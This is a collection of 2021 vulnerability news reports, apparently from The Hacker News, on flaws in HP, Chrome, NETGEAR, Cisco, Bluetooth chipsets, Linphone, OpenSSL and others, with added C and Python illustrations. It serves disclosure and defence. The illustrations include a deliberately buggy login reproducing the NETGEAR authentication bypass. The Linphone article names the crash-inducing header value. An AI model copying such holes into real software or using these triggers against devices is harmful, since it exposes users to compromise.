HP OMEN Gaming Hub Flaw Affects Millions of Windows Computers
19.9.21 
Vulnerebility  Thehackernews
Cybersecurity researchers on Tuesday disclosed details about a high-severity flaw in the HP OMEN driver software that impacts millions of gaming computers worldwide, leaving them open to an array of attacks.

Tracked as CVE-2021-3437 (CVSS score: 7.8), the vulnerability could allow threat actors to escalate privileges to kernel mode without requiring administrator permissions, allowing them to disable security products, overwrite system components, and even corrupt the operating system.

Cybersecurity firm SentinelOne, which discovered and reported the shortcoming to HP on February 17, said it found no evidence of in-the-wild exploitation. The computer hardware company has since released a security update to its customers to address these vulnerabilities.

The issues themselves are rooted in a component called OMEN Command Center that comes pre-installed on HP OMEN-branded laptops and desktops and can also be downloaded from the Microsoft Store. The software, in addition to monitoring the GPU, CPU, and RAM via a vitals dashboard, is designed to help fine-tune network traffic and overclock the gaming PC for faster computer performance.

"The problem is that HP OMEN Command Center includes a driver that, while ostensibly developed by HP, is actually a partial copy of another driver full of known vulnerabilities," SentinelOne researchers said in a report shared with The Hacker News.

"In the right circumstances, an attacker with access to an organization's network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement."

The driver in question is HpPortIox64.sys, which derives its functionality from OpenLibSys-developed WinRing0.sys — a problematic driver that emerged as the source of a local privilege escalation bug in EVGA Precision X1 software (CVE-2020-14979, CVSS score: 7.8) last year.

"WinRing0 allows users to read and write to arbitrary physical memory, read and modify the model-specific registers (MSRs), and read/write to IO ports on the host," researchers from SpecterOps noted in August 2020. "These features are intended by the driver's developers. However, because a low-privileged user can make these requests, they present an opportunity for local privilege escalation."

The core issue stems from the fact that the driver accepts input/output control (IOCTL) calls without applying any kind of ACL enforcement, thus allowing bad actors unrestricted access to the aforementioned features, including capabilities to overwrite a binary that's loaded by a privileged process and ultimately run code with elevated privileges.

"To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations," the researchers said.

The findings mark the second time WinRing0.sys has come under the lens for causing security issues in HP products.

In October 2019, SafeBreach Labs revealed a critical vulnerability in HP Touchpoint Analytics software (CVE-2019-6333), which comes included with the driver, thus potentially allowing threat actors to leverage the component to read arbitrary kernel memory and effectively allowlist malicious payloads via a signature validation bypass.

Following the disclosure, enterprise firmware security company Eclypsium — as part of its "Screwed Drivers" initiative to compile a repository of insecure drivers and shed light on how they can be abused by attackers to gain control over Windows-based systems — dubbed WinRing0.sys a "wormhole driver by design."

The discovery is also the third in a series of security vulnerabilities affecting software drivers that have been uncovered by SentinelOne since the start of the year.

Earlier this May, the Mountain View-based company revealed details about multiple privilege escalation vulnerabilities in Dell's firmware update driver named "dbutil_2_3.sys" that went undisclosed for more than 12 years. Then in July, it also made public a high-severity buffer overflow flaw impacting "ssport.sys" and used in HP, Xerox, and Samsung printers that was found to have remained undetected since 2005.


Update Google Chrome to Patch 2 New Zero-Day Flaws Under Attack
19.9.21 
Vulnerebility  Thehackernews
Google on Monday released security updates for the Chrome web browser to address a total of 11 security issues, two of which it says are actively exploited zero-days in the wild.

Tracked as CVE-2021-30632 and CVE-2021-30633, the vulnerabilities concern an out-of-bounds write in the V8 JavaScript engine and a use-after-free flaw in the IndexedDB API respectively, with the internet giant crediting anonymous researchers for reporting the bugs on September 8.

As is typically the case, the company said it's "aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild" without sharing additional specifics about how, when, and where the vulnerabilities were exploited, or the threat actors that may be abusing them.

With these two security shortcomings, Google has addressed a total of 11 zero-day vulnerabilities in Chrome since the start of the year —

CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 - Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in WebGL
CVE-2021-30563 - Type confusion in V8
Chrome users are advised to update to the latest version (93.0.4577.82) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaws.


Critical Bug Reported in NPM Package With Millions of Downloads Weekly
19.9.21 
Vulnerebility  Thehackernews
A widely used NPM package called 'Pac-Resolver' for the JavaScript programming language has been remediated with a fix for a high-severity remote code execution vulnerability that could be abused to run malicious code inside Node.js applications whenever HTTP requests are sent.

The flaw, tracked as CVE-2021-23406, has a severity rating of 8.1 on the CVSS vulnerability scoring system and affects Pac-Resolver versions before 5.0.0.

A Proxy Auto-Configuration (PAC) file is a JavaScript function that determines whether web browser requests should be routed directly to the destination or forwarded to a web proxy server for a given hostname. PAC files are how proxy rules are distributed in enterprise environments.

"This package is used for PAC file support in Pac-Proxy-Agent, which is used in turn in Proxy-Agent, which is then used all over the place as the standard go-to package for HTTP proxy auto-detection and configuration in Node.js," Tim Perry said in a write-up published late last month. "It's very popular: Proxy-Agent is used everywhere from AWS's CDK toolkit to the Mailgun SDK to the Firebase CLI."

CVE-2021-23406 has to do with how Pac-Proxy-Agent doesn't sandbox PAC files correctly, resulting in a scenario where an untrusted PAC file can be abused to break out of the sandbox entirely and run arbitrary code on the underlying operating system. This, however, necessitates that the attacker either resides on the local network, has the capability to tamper with the contents of the PAC file, or chains it with a second vulnerability to alter the proxy configuration.

"This is a well-known attack against the VM module, and it works because Node doesn't isolate the context of the 'sandbox' fully, because it's not really trying to provide serious isolation," Perry said. "The fix is simple: use a real sandbox instead of the VM built-in module."

Red Hat, in an independent advisory, said the vulnerable package is shipped with its Advanced Cluster Management for Kubernetes product, but noted it's "currently not aware of the vector to trigger the vulnerability in the affected component, furthermore the affected component is protected by user authentication lowering the potential impact of this vulnerability."


Microsoft Warns of Cross-Account Takeover Bug in Azure Container Instances
10.9.21 
Vulnerebility   Thehackernews

Microsoft on Wednesday said it remediated a vulnerability in its Azure Container Instances (ACI) services that could have been exploited by a malicious actor "to access other customers' information" in what the researcher described as the "first cross-account container takeover in the public cloud."

An attacker exploiting the weakness could execute malicious commands on other users' containers and steal customer secrets and images deployed to the platform. The Windows maker did not share any additional specifics related to the flaw, other than to recommend that affected customers "revoke any privileged credentials that were deployed to the platform before August 31, 2021."

Azure Container Instances is a managed service that allows users to run Docker containers directly in a serverless cloud environment, without requiring the use of virtual machines, clusters, or orchestrators.

Palo Alto Networks' Unit 42 threat intelligence team dubbed the vulnerability "Azurescape," referring to how an attacker can leverage the cross-tenant technique to escape their rogue ACI container, escalate privileges over a multitenant Kubernetes cluster, and take control of impacted containers by executing malicious code.

Breaking out of the container, the researchers said, was made possible due to an outdated container runtime used in ACI (runC v1.0.0-rc2), thereby making it possible to exploit CVE-2019-5736 (CVSS score: 8.6) to escape the container and get code execution with elevated privileges on the underlying host.

Microsoft said it notified select customers with containers running on the same Kubernetes cluster as that of the malicious container created by Palo Alto Networks to demonstrate the attack. The cluster is said to have hosted 100 customer pods and about 120 nodes, with the company stating it had no evidence bad actors had abused the flaw to carry out real-world intrusions, adding its investigation "surfaced no unauthorized access to customer data."

The disclosure is the second Azure-related flaw to come to light in a span of two weeks, the first one being a critical Cosmos database flaw that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization.

"This discovery highlights the need for cloud users to take a 'defense-in-depth' approach to securing their cloud infrastructure that includes continuous monitoring for threats — inside and outside the cloud platform," Unit 42 researchers Ariel Zelivanky and Yuval Avrahami said. "Discovery of Azurescape also underscores the need for cloud service providers to provide adequate access for outside researchers to study their environments, searching for unknown threats."


New 0-Day Attack Targeting Windows Users With Microsoft Office Documents
10.9.21 
Vulnerebility  Thehackernews

Microsoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.

Tracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), the proprietary browser engine of the now-discontinued Internet Explorer that is also used in Office to render web content inside Word, Excel, and PowerPoint documents.

"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents," the company said.

"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights," it added.

The Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, but did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets.

EXPMON, in a tweet, noted it found the vulnerability after detecting a "highly sophisticated zero-day attack" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. "The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous)," EXPMON researchers said.

However, it's worth pointing out that the current attack can be blocked if Microsoft Office is run with its default configuration, in which documents downloaded from the web are opened in Protected View or Application Guard for Office, which is designed to prevent untrusted files from accessing trusted resources on the system.

Microsoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch "depending on customer needs." In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.


Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server
10.9.21 
Vulnerebility  Thehackernews
The maintainers of Jenkins—a popular open-source automation server software—have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.

The "successful attack," which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.

"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected," the company said in a statement published over the weekend.

The disclosure comes as the U.S. Cyber Command warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.

Tracked as CVE-2021-26084 (CVSS score: 9.8), the flaw is an OGNL (Object-Graph Navigation Language) injection that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.

According to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.


Critical Auth Bypass Bug Affects NETGEAR Smart Switches — Patch and PoC Released
10.9.21 
Vulnerebility  Thehackernews

Networking, storage and security solutions provider Netgear on Friday issued patches to address three security vulnerabilities affecting its smart switches that could be abused by an adversary to gain full control of a vulnerable device.

The flaws, which were discovered and reported to Netgear by Google security engineer Gynvael Coldwind, impact the following models -

GC108P (fixed in firmware version 1.0.8.2)
GC108PP (fixed in firmware version 1.0.8.2)
GS108Tv3 (fixed in firmware version 7.0.7.2)
GS110TPP (fixed in firmware version 7.0.7.2)
GS110TPv3 (fixed in firmware version 7.0.7.2)
GS110TUP (fixed in firmware version 1.0.5.3)
GS308T (fixed in firmware version 1.0.3.2)
GS310TP (fixed in firmware version 1.0.3.2)
GS710TUP (fixed in firmware version 1.0.5.3)
GS716TP (fixed in firmware version 1.0.4.2)
GS716TPP (fixed in firmware version 1.0.4.2)
GS724TPP (fixed in firmware version 2.0.6.3)
GS724TPv2 (fixed in firmware version 2.0.6.3)
GS728TPPv2 (fixed in firmware version 6.0.8.2)
GS728TPv2 (fixed in firmware version 6.0.8.2)
GS750E (fixed in firmware version 1.0.1.10)
GS752TPP (fixed in firmware version 6.0.8.2)
GS752TPv2 (fixed in firmware version 6.0.8.2)
MS510TXM (fixed in firmware version 1.0.4.2)
MS510TXUP (fixed in firmware version 1.0.4.2)
According to Coldwind, the flaws concern an authentication bypass, an authentication hijacking, and a third as-yet-undisclosed vulnerability that could grant an attacker the ability to change the administrator password without actually having to know the previous password or hijack the session bootstrapping information, resulting in a full compromise of the device.

The three vulnerabilities have been given the codenames Demon's Cries (CVSS score: 9.8), Draconian Fear (CVSS score: 7.8), and Seventh Inferno (TBD).

"A funny bug related to authorization spawns from the fact that the password is obfuscated by being XORed with 'NtgrSmartSwitchRock'," Coldwind said in a write-up explaining the authentication bypass. "However, due to the fact that in the handler of TLV type 10 an strlen() is called on the still obfuscated password, it makes it impossible to authenticate correctly with a password that happens to have the same character as the phrase above at a given position."
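To make the mechanism in that quote concrete, here is an added C illustration (not Netgear's firmware code) of a handler that measures the XOR-obfuscated password with strlen() beside one that honours the TLV length field. The XOR key is the phrase quoted above; the passwords, buffer sizes and function names are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added illustration of the strlen()-on-obfuscated-buffer bug described in the
 * write-up; this is not Netgear firmware code. The XOR key is the string quoted
 * in the article; passwords and buffer sizes are constructed for the demo. */

#define PW_MAX 64
static const char OBF_KEY[] = "NtgrSmartSwitchRock";

/* XOR each byte with the repeating key. XOR is its own inverse, so the same
 * routine obfuscates and de-obfuscates. It works on an explicit length, never
 * on NUL termination, because an obfuscated byte can legitimately be 0x00. */
static void xor_with_key(const unsigned char *src, size_t len, unsigned char *dst) {
    size_t klen = strlen(OBF_KEY);
    for (size_t i = 0; i < len; i++)
        dst[i] = src[i] ^ (unsigned char)OBF_KEY[i % klen];
}

/* Length the buggy handler "sees": strlen() over the obfuscated bytes stops at
 * the first position where a password byte equals the key byte (x ^ x == 0). */
size_t obfuscated_strlen(const char *pw) {
    unsigned char obf[PW_MAX + 1] = {0};
    size_t len = strlen(pw);
    if (len > PW_MAX) len = PW_MAX;
    xor_with_key((const unsigned char *)pw, len, obf);
    return strlen((const char *)obf);
}

/* Buggy handler (mirrors the described TLV type 10 behaviour): the client sends
 * the obfuscated password; the server measures it with strlen() and therefore
 * silently truncates it at the first 0x00 byte before de-obfuscating. */
int buggy_login(const char *stored_pw, const char *attempt) {
    unsigned char obf[PW_MAX + 1] = {0}, plain[PW_MAX + 1] = {0};
    size_t len = strlen(attempt);
    if (len > PW_MAX) return 0;
    xor_with_key((const unsigned char *)attempt, len, obf);   /* client side */
    size_t seen = strlen((const char *)obf);                  /* BUG: truncates at 0x00 */
    xor_with_key(obf, seen, plain);                           /* server side */
    return strcmp(stored_pw, (const char *)plain) == 0;
}

/* Fixed handler: trusts the explicit TLV length instead of strlen(), and
 * compares in constant time so the check leaks nothing about where the
 * first mismatching byte sits. */
int fixed_login(const char *stored_pw, const char *attempt) {
    unsigned char obf[PW_MAX], plain[PW_MAX];
    size_t len = strlen(attempt);          /* stands in for the TLV length field */
    if (len > PW_MAX) return 0;
    xor_with_key((const unsigned char *)attempt, len, obf);
    xor_with_key(obf, len, plain);
    size_t slen = strlen(stored_pw);
    unsigned char diff = (unsigned char)(slen != len);
    for (size_t i = 0; i < len; i++)
        diff |= plain[i] ^ (unsigned char)(i < slen ? stored_pw[i] : 0);
    return diff == 0;
}

int main(void) {
    /* Constructed passwords: no key collision, collision at byte 0, collision at byte 4. */
    const char *pws[] = { "Passw0rd", "Network1", "PassSecret" };
    for (size_t i = 0; i < sizeof pws / sizeof pws[0]; i++)
        printf("%-11s strlen(obf)=%zu buggy=%d fixed=%d\n", pws[i],
               obfuscated_strlen(pws[i]), buggy_login(pws[i], pws[i]),
               fixed_login(pws[i], pws[i]));
    return 0;
}
```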

Draconian Fear, on the other hand, requires the attacker to either have the same IP address as the admin or be able to spoof the address through other means. In such a scenario, the malicious party can take advantage of the fact that the Web UI relies only on the IP and a trivially guessable "userAgent" string to flood the authentication endpoint with multiple requests, thereby "greatly increasing the odds of getting the session information before admin's browser gets it."

In light of the critical nature of the vulnerabilities, companies relying on the aforementioned Netgear switches are recommended to upgrade to the latest version as soon as possible to mitigate any potential exploitation risk.


Cisco Issues Patch for Critical Enterprise NFVIS Flaw — PoC Exploit Available
3.9.21 
Vulnerebility  Thehackernews
Cisco has patched a critical security vulnerability impacting its Enterprise Network Function Virtualization Infrastructure Software (NFVIS) that could be exploited by an attacker to take control of an affected system.

Tracked as CVE-2021-34746, the weakness has been rated 9.8 out of a maximum of 10 on the Common Vulnerability Scoring System (CVSS) and could allow a remote attacker to circumvent authentication and log in to a vulnerable device as an administrator.

The network equipment maker said it's aware of publicly available proof-of-concept (PoC) exploit code targeting the vulnerability, but added it has not detected any successful weaponization attempts in the wild.

The issue stems from incomplete validation of user-supplied input that's passed to an authentication script during the sign-in process, enabling an attacker to inject parameters into an authentication request. "A successful exploit could allow the attacker to bypass authentication and log in as an administrator to the affected device," the company said in an advisory.

It's worth pointing out that enterprise NFVIS deployments are impacted by this vulnerability only if the TACACS external authentication method is configured on a targeted device, which can be determined by running the "show running-config tacacs-server" command. "If the output of the show running-config tacacs-server command is No entries found, the TACACS external authentication feature is not enabled," the company noted.

The patches come a little over a week after Cisco rolled out updates to address a critical security vulnerability (CVE-2021-1577) affecting the Application Policy Infrastructure Controller (APIC) interface used in its Nexus 9000 Series Switches that could be potentially abused to read or write arbitrary files on a vulnerable system.

The company is also in the process of readying fixes for a zero-day bug (CVE-2021-1585) in its Adaptive Security Device Manager (ASDM) Launcher that could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system.


New BrakTooth Flaws Leave Millions of Bluetooth-enabled Devices Vulnerable
3.9.21 
Vulnerebility  Thehackernews
A set of new security vulnerabilities has been disclosed in commercial Bluetooth stacks that could enable an adversary to execute arbitrary code and, worse, crash the devices via denial-of-service (DoS) attacks.

Collectively dubbed "BrakTooth" (referring to the Norwegian word "Brak," which translates to "crash"), the 16 security weaknesses span 13 Bluetooth chipsets from 11 vendors such as Intel, Qualcomm, Zhuhai Jieli Technology, and Texas Instruments, covering an estimated 1,400 or more commercial products, including laptops, smartphones, programmable logic controllers, and IoT devices.

The flaws were disclosed by researchers from the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design (SUTD).

"All the vulnerabilities […] can be triggered without any previous pairing or authentication," the researchers noted. "The impact of our discovered vulnerabilities is categorized into (I) crashes and (II) deadlocks. Crashes generally trigger a fatal assertion, segmentation faults due to a buffer or heap overflow within the SoC firmware. Deadlocks, in contrast, lead the target device to a condition in which no further BT communication is possible."

The most severe of the 16 bugs is CVE-2021-28139, which affects the ESP32 SoC used in many Bluetooth-based appliances ranging from consumer electronics to industrial equipment. Arising from a missing out-of-bounds check in the library, the flaw enables an attacker to inject arbitrary code on vulnerable devices, including erasing their NVRAM data.

Other vulnerabilities could result in the Bluetooth functionality getting entirely disabled via arbitrary code execution, or cause a denial-of-service condition in laptops and smartphones employing Intel AX200 SoCs. "This vulnerability allows an attacker to forcibly disconnect slave BT devices currently connected to AX200 under Windows or Linux Laptops," the researchers said. "Similarly, Android phones such as Pocophone F1 and Oppo Reno 5G experience BT disruptions."

Additionally, a third collection of flaws discovered in Bluetooth speakers, headphones, and audio modules could be abused to freeze and even completely shut down the devices, requiring the users to manually turn them back on. Troublingly, all the aforementioned BrakTooth attacks could be carried out with a readily available Bluetooth packet sniffer that costs less than $15.

While Espressif, Infineon (Cypress), and Bluetrum Technology have released firmware patches to rectify the identified vulnerabilities, Intel, Qualcomm, and Zhuhai Jieli Technology are said to be investigating the flaws or in the process of readying security updates. Texas Instruments, however, doesn't intend to release a fix unless "demanded by customers."

The ASSET group has also made available a proof-of-concept (PoC) tool that can be used by vendors producing Bluetooth SoCs, modules, and products to replicate the vulnerabilities and validate against BrakTooth attacks.


Linphone SIP Stack Bug Could Let Attackers Remotely Crash Client Devices
3.9.21 
Vulnerebility  Thehackernews

Cybersecurity researchers on Tuesday disclosed details about a zero-click security vulnerability in the Linphone Session Initiation Protocol (SIP) stack that could be remotely exploited without any action from a victim to crash the SIP client and cause a denial-of-service (DoS) condition.

Tracked as CVE-2021-33056 (CVSS score: 7.5), the issue concerns a NULL pointer dereference vulnerability in the "belle-sip" component, a C-language library used to implement SIP transport, transaction, and dialog layers, with all versions prior to 4.5.20 affected by the flaw. The weakness was discovered and reported by industrial cybersecurity company Claroty.

Linphone is an open-source and cross-platform SIP client with support for voice and video calls, end-to-end encrypted messaging, and audio conference calls, among others. SIP, on the other hand, is a signaling protocol used for initiating, maintaining, and terminating real-time multimedia communication sessions for voice, video, and messaging applications over the internet.

To that end, the remotely exploitable vulnerability can be activated by adding a malicious forward slash ("</") to a SIP message header such as To (the call recipient), From (initiator of the call), or Diversion (redirect the destination endpoint), resulting in a crash of the SIP client application that uses the belle-sip library to handle and parse SIP messages.

"The underlying bug here is that non-SIP URIs are accepted as valid SIP header values," Claroty researcher Sharon Brizinov said in a write-up. "Therefore, a generic URI such as a simple single forward slash will be considered a SIP URI. This means that the given URI will not contain a valid SIP scheme (scheme will be NULL), and so when the [string] compare function is called with the non-existent scheme (NULL), a null pointer dereference will be triggered and crash the SIP client."
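As an added illustration (not belle-sip or Linphone code) of the parsing defect Brizinov describes, the following C routine extracts the address from a To/From/Diversion header value, splits off the scheme, and rejects a generic URI whose scheme is NULL before any string comparison runs. The header samples and function names are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added illustration of the belle-sip defect described above; not Linphone or
 * belle-sip code. Header samples in main() are constructed for the demo. */

#define URI_MAX 256

typedef struct {
    char buf[URI_MAX];
    const char *scheme;  /* points into buf, or NULL for a generic URI such as "/" */
    const char *rest;    /* everything after the scheme's ':' (or the whole text) */
} sip_uri_t;

/* Copy the address text into u->buf and split "scheme:rest". The scheme must
 * be ALPHA *(ALPHA / DIGIT / "+" / "-" / ".") as in RFC 3986; anything else,
 * including a bare "/", is a scheme-less generic URI and leaves scheme NULL. */
static int parse_uri(const char *text, sip_uri_t *u) {
    size_t len = strlen(text);
    if (len == 0 || len >= sizeof u->buf) return 0;
    memcpy(u->buf, text, len + 1);
    u->scheme = NULL;
    u->rest = u->buf;
    char *colon = strchr(u->buf, ':');
    if (colon && colon != u->buf && isalpha((unsigned char)u->buf[0])) {
        int ok = 1;
        for (const char *p = u->buf + 1; p < colon; p++)
            if (!isalnum((unsigned char)*p) && !strchr("+-.", *p)) ok = 0;
        if (ok) { *colon = '\0'; u->scheme = u->buf; u->rest = colon + 1; }
    }
    return 1;
}

/* Pull the address out of a header value: the text inside <...> when angle
 * brackets are present, otherwise the value up to the first ';' parameter. */
static int extract_addr(const char *value, char *out, size_t outsz) {
    const char *lt = strchr(value, '<');
    const char *gt = lt ? strchr(lt, '>') : NULL;
    const char *start, *end;
    if (lt && gt) { start = lt + 1; end = gt; }
    else if (!lt) { start = value; end = strchr(value, ';'); if (!end) end = value + strlen(value); }
    else return 0;                               /* '<' without a closing '>' */
    while (start < end && isspace((unsigned char)*start)) start++;
    while (end > start && isspace((unsigned char)end[-1])) end--;
    if (end <= start || (size_t)(end - start) >= outsz) return 0;
    memcpy(out, start, (size_t)(end - start));
    out[end - start] = '\0';
    return 1;
}

/* Hardened check: a To/From/Diversion address is accepted only if it parses AND
 * carries an explicit sip/sips scheme. The NULL test on the scheme is the guard
 * whose absence let strcmp() run on a missing scheme and crash the client. */
int header_has_sip_uri(const char *value) {
    char addr[URI_MAX];
    sip_uri_t u;
    if (!extract_addr(value, addr, sizeof addr)) return 0;
    if (!parse_uri(addr, &u)) return 0;
    if (u.scheme == NULL) return 0;              /* generic URI like "/": reject, never compare */
    return strcmp(u.scheme, "sip") == 0 || strcmp(u.scheme, "sips") == 0;
}

int main(void) {
    /* Constructed header values: two valid, then the kind of value the write-up describes. */
    const char *samples[] = {
        "\"Alice\" <sips:alice@example.com>;tag=1928301774",
        "sip:carol@example.com;tag=abc",
        "</>",
        "<http://example.com/>",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-50s -> %s\n", samples[i],
               header_has_sip_uri(samples[i]) ? "sip uri" : "rejected");
    return 0;
}
```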

It's worth noting that the flaw is also a zero-click vulnerability as it's possible to cause the SIP client to crash simply by sending an INVITE SIP request with a specially-crafted From/To/Diversion header. As a consequence, any application that uses belle-sip to analyze SIP messages will be rendered unavailable upon receiving a malicious SIP "call."

Although the patches are available for the core protocol stack, it's essential that the updates are applied downstream by vendors that rely on the affected SIP stack in their products.

"Successful exploits targeting IoT vulnerabilities have demonstrated they can provide an effective foothold onto enterprise networks," Brizinov said. "A flaw in a foundational protocol such as the SIP stack in VoIP phones and applications can be especially troublesome given the scale and reach shown by attacks against numerous other third-party components used by developers in software projects."


QNAP Working on Patches for OpenSSL Flaws Affecting its NAS Devices
3.9.21 
Vulnerebility  Thehackernews
Network-attached storage (NAS) appliance maker QNAP said it's currently investigating two recently patched security flaws in OpenSSL to determine their potential impact, adding it will release security updates should its products turn out to be vulnerable.

Tracked as CVE-2021-3711 (CVSS score: 7.5) and CVE-2021-3712 (CVSS score: 4.4), the weaknesses concern a high-severity buffer overflow in the SM2 decryption function and a buffer overrun when processing ASN.1 strings; they could be abused by adversaries to run arbitrary code, cause a denial-of-service condition, or disclose private memory contents such as private keys or sensitive plaintext —

CVE-2021-3711 - OpenSSL SM2 decryption buffer overflow
CVE-2021-3712 - Read buffer overruns processing ASN.1 strings
"A malicious attacker who is able [to] present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash," according to the advisory for CVE-2021-3711.

OpenSSL, a widely used open-source cryptographic library that provides encrypted connections using Secure Sockets Layer (SSL) or Transport Layer Security (TLS), addressed the issues in versions OpenSSL 1.1.1l and 1.0.2za that were shipped on August 24.
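A version triage helper for the fixed releases named above, added here as an example (it is not a QNAP, NetApp, or OpenSSL tool, and the sample version strings are constructed). It encodes the one thing people get wrong when comparing pre-3.0 OpenSSL versions: the patch letter sorts by length first, so 1.0.2za is newer than 1.0.2y.

```python
"""Check `openssl version` output against the CVE-2021-3711 / CVE-2021-3712 fixes.

Added example for this page, not vendor tooling. First fixed releases per the
OpenSSL advisory: 1.1.1l and 1.0.2za. Caveat: distribution packages commonly
backport a fix without bumping the letter, so for a packaged OpenSSL the
package changelog, not this string, is the authoritative record.
"""
import re
from typing import Dict, List, Optional, Tuple

# First fixed release for each affected branch (from the OpenSSL advisory).
FIXED_IN = {"1.1.1": "l", "1.0.2": "za"}

_VERSION_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_version(text: str) -> Optional[Tuple[str, str]]:
    """Split 'OpenSSL 1.1.1k  25 Mar 2021' into ('1.1.1', 'k'); None if absent."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, letters = m.groups()
    return f"{major}.{minor}.{patch}", letters


def letter_rank(letters: str) -> Tuple[int, str]:
    """Pre-3.0 patch letters sort '' < 'a' < ... < 'z' < 'za' < 'zb':
    by length first, then alphabetically."""
    return (len(letters), letters)


def is_patched(version_string: str) -> Tuple[Optional[bool], str]:
    """True/False for the two affected branches; None when the advisory does
    not speak to the string (unparseable, or a branch such as 3.0 whose status
    has to be read from its own release notes)."""
    parsed = parse_version(version_string)
    if parsed is None:
        return None, "unrecognised version string"
    base, letters = parsed
    if base not in FIXED_IN:
        return None, f"{base} is outside the 1.0.2/1.1.1 branches covered by the advisory"
    fixed = FIXED_IN[base]
    if letter_rank(letters) >= letter_rank(fixed):
        return True, f"{base}{letters} includes the fix (first fixed: {base}{fixed})"
    return False, f"{base}{letters} predates {base}{fixed}; update"


def audit(version_strings: List[str]) -> Dict[str, Tuple[Optional[bool], str]]:
    """Classify a batch of version strings, e.g. collected from a fleet."""
    return {v: is_patched(v) for v in version_strings}


# Constructed samples in the format `openssl version` prints.
SAMPLES = [
    "OpenSSL 1.1.1k  25 Mar 2021",
    "OpenSSL 1.1.1l  24 Aug 2021",
    "OpenSSL 1.0.2y  16 Feb 2021",
    "OpenSSL 1.0.2za  24 Aug 2021",
    "OpenSSL 1.1.1  11 Sep 2018",
    "OpenSSL 3.0.0-beta2",
    "LibreSSL 3.3.3",
]

if __name__ == "__main__":
    for v, (ok, why) in audit(SAMPLES).items():
        print(f"{v:32s} {str(ok):5s} {why}")
```

On an appliance such as a NAS, the string usually comes from a vendor-built binary rather than a distribution package, which is exactly the case where the letter is meaningful and the vendor advisory is what says whether a rebuild shipped.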

In the meanwhile, NetApp on Tuesday confirmed that the flaws affect a number of its products, while it continues to assess the rest of its lineup —

Clustered Data ONTAP
Clustered Data ONTAP Antivirus Connector
E-Series SANtricity OS Controller Software 11.x
NetApp Manageability SDK
NetApp SANtricity SMI-S Provider
NetApp SolidFire & HCI Management Node
NetApp Storage Encryption
The development follows days after NAS maker Synology also disclosed that it's opened an investigation into a number of models, comprising DSM 7.0, DSM 6.2, DSM UC, SkyNAS, VS960HD, SRM 1.2, VPN Plus Server, and VPN Server, to check if they are affected by the same two flaws.

"Multiple vulnerabilities allow remote attackers to conduct denial-of-service attack[s] or possibly execute arbitrary code via a susceptible version of Synology DiskStation Manager (DSM), Synology Router Manager (SRM), VPN Plus Server or VPN Server," the Taiwanese company said in an advisory.

Other companies whose products rely on OpenSSL have also released security bulletins, including —

Debian
Red Hat (CVE-2021-3711, CVE-2021-3712)
SUSE (CVE-2021-3711, CVE-2021-3712), and
Ubuntu (CVE-2021-3711, CVE-2021-3712).


Attackers Can Remotely Disable Fortress Wi-Fi Home Security Alarms
3.9.21 
Vulnerebility  Thehackernews
New vulnerabilities have been discovered in Fortress S03 Wi-Fi Home Security System that could be potentially abused by a malicious party to gain unauthorized access with an aim to alter system behavior, including disarming the devices without the victim's knowledge.

The two unpatched issues, tracked under the identifiers CVE-2021-39276 (CVSS score: 5.3) and CVE-2021-39277 (CVSS score: 5.7), were discovered and reported by cybersecurity firm Rapid7 in May 2021 with a 60-day deadline to fix the weaknesses.

